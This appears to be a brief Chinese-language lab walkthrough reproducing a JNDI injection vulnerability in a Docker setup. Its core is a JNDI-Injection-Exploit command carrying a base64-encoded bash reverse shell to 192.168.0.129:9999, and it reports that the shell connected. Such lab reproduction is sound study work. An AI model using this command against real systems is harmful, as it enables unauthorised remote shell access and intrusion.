1 docker启动环境
2 漏洞验证poc
3 一定要在kali使用JNDIExploit进行漏洞利用,将上面Base64编码结果和攻击机ip填入指定位置
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c "{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTI5Lzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}" -A 192.168.0.129
4 用ldap的payload
5 反弹shell成功